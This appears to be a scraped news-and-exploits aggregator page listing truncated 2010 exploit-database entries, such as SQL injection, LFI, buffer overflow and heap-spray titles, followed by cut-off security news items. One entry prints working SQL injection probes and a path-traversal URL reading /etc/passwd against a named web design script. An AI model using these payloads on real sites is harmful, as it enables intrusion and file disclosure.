Information Security News and Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Atar2b Web Design LFI &amp; SQL Injection Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>===================================================
Atar2b Web Design LFI &amp; SQL Injection Vulnerability
===================================================
Author : CoBRa_21
Author Web Page :http://ipbul.org
Dork : null
Script Page : http://www.atar2b.co.il/
Demo Site : http://opr.co.il/
########################################################################################
Sql Injection :
http://localhost/[path]/page.php?id=1′ (Sql)
http://localhost/[path]/page_e.php?id=1′ (Sql)
http://localhost/[path]/customers.php?id=1′ (Sql)
http://localhost/[path]/customers_e.php?id=1′ (Sql)
########################################################################################
LFI Exploits :
http://localhost/[path]/page.php?id=../../../../../../../../../../../etc/passwd%00
http://local host/[path]/page_e.php?id=../../../../../../../../../../../etc/passwd%00
########################################################################################
Thanks [...]

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Foo-Goo (calendar.php &amp; gallery.php id) SQL Injection Exploit (.py)</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>===================================================================
Foo-Goo (calendar.php &amp; gallery.php id) SQL Injection Exploit (.py)
===================================================================
#!/usr/bin/env python
#-*- coding:cp1254 -*-
# Foo-Goo (calendar.php &amp; gallery.php id) SQL Injection Exploit (.py)
# Exploit Coded By ZoRLu / Date: 02/08/2010
# Tested [...]

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Visual MP3 Splitter &amp; Joiner 6.1(.mp3) Buffer Overflow POC</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>==========================================================
Visual MP3 Splitter &amp; Joiner 6.1(.mp3) Buffer Overflow POC
==========================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ [...]

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>CoolPlayer219_Bin (.m3u) (buf+eip+nop / 253 byt) Buffer Overflow</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>=================================================================
CoolPlayer219_Bin (.m3u) (buf+eip+nop / 253 byt) Buffer Overflow
=================================================================
#!/usr/bin/env python
#-*- coding:cp1254 -*-
print &quot;**************************************************************************&quot;
print &quot; CoolPlayer219_Bin (.m3u) (buf+eip+nop / 253 byt) Buffer Overflow Exploit (.py)n &quot;
print &quot; Exploited: ZoRLu [...]

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>PHPKick v0.8 statistics.php SQL Injection Exploit</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>=================================================
PHPKick v0.8 statistics.php SQL Injection Exploit
=================================================
# Date: August 8th, 2010
# Time: 03:45am ;(
# Author: garwga
# Version: 0.8
# Google dork : &quot;© 2004 PHPKick.de Version 0.8&quot;
# Category: webapps/0day
# Code: see below
&lt;?php
[...]

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Easy Member Pro By Pass Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>=====================================
Easy Member Pro By Pass Vulnerability
=====================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ [...]

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Digistore Ecommerce V4.0 Changer Login and Pass CSRF Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>==================================================================
Digistore Ecommerce V4.0 Changer Login and Pass CSRF Vulnerability
==================================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ [...]

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>kleeja1.0.0RC6 Database Disclosure Exploit</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>==========================================
kleeja1.0.0RC6 Database Disclosure Exploit
==========================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ [...]

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Secure Browser 2.0 DOS Exploit </title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>==============================
Secure Browser 2.0 DOS Exploit
==============================
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=
AUTHOR : Cur53D
MAIL : Hyq6xx[at]gmail.com
DATE [...]

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>myMP3-Player v3.0 Buffer Overflow Exploit</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>=========================================
myMP3-Player v3.0 Buffer Overflow Exploit
=========================================
# Exploit Title: myMP3-Player 3.0 (NOT SEH Overwrite)
# Date: 8 / 8 / 2010
# Author: Oh Yaw Theng
# Software Link: http://www.chip.de/downloads/myMP3-Player-3.0_13008621.html
# Version: 3.0
# Tested on: Windows XP SP 2
# [...]

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Advanced File Vault(eSellerateControl350.dll) Activex Heap Spray</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>================================================================
Advanced File Vault(eSellerateControl350.dll) Activex Heap Spray
================================================================
//# Exploit Title: Advanced File Vault(eSellerateControl350.dll) Activex Heap Spray 0-day
//# Date: 08-08-2010
//# Author: ThE g0bL!N
//# Version: 0-day
//# Tested on: xp sp2
&lt;html&gt;
&lt;script language=&quot;JavaScript&quot; defer&gt;
var [...]

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Eclosion (index.php) Blind SQL Injection Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>======================================================
Eclosion (index.php) Blind SQL Injection Vulnerability
======================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ [...]

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Riperfruit SQL Injection Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>======================================
Riperfruit SQL Injection Vulnerability
======================================
Special to adhan a.k.a Cr4wL3R — Dont Talk : My Last Exploit, I dont Like !!! ,
We all, Big Family H4ckb0x Organization miss u broth@
__ [...]

An extradited Estonian hacker has pled not guilty to bilking the Royal Bank of Scotland of nine million dollars in a single day by tampering with its payroll debit cards around the world, US officials have said.
Sergei Tsurikov, 26, was extradited from Estonia on charges he and a team of young hackers committed wire and [...]

There are many reasons people fall for each other: Personality, looks, humor — sax-playing ability. But a new class of GPS-enabled smartphone apps is trying to bring dating back to the pure, data-driven basics.
Latitude and longitude. In this new era of app-driven love, location is most important.
Take, for example, the story of Scott Kutcher and [...]

Microsoft on Friday said it is investigating an unpatched vulnerability in Windows after an Israeli researcher revealed a bug in the operating system’s kernel driver.
According to Gil Dabah, a researcher from Tel Aviv who goes by the nickname "arkon," the Windows’ kernel harbors a heap overflow vulnerability. Dabah also posted a short proof-of-concept to demonstrate [...]

Whether the customer has an I-Phone or an Android device, security has always been an issue. We are all well aware of the hazards of accessing the web, which is forever under attack by advertisers, spammers, hackers and malicious code juicers. It is natural to ask the same questions about a tiny computer that accesses [...]

For a few weeks in 1982, I was convinced that space aliens were outside my house. I had irrefutable evidence: strange lights, odd noises, and the like. Of course, the lights were the neighbor’s pool, and the noises were the wind. I was just a child, caught up in the hysteria of having just watched [...]

One of the operators of whistle-blowing website WikiLeaks said its work will go on, despite pressure from the U.S military sources worried what can of worms the site will open up next
"I can assure you that we will keep publishing documents – that’s what we do," a WikiLeaks spokesman, who goes by the name of [...]

Canada’s Research In Motion has reached a preliminary agreement with Saudi Arabia’s telecom watchdog and mobile phone operators to set up a server in the country to handle Blackberry data, according to reports.
"A preliminary agreement has already been reached and a formal deal between the parties is in the final stages of negotiations," an official [...]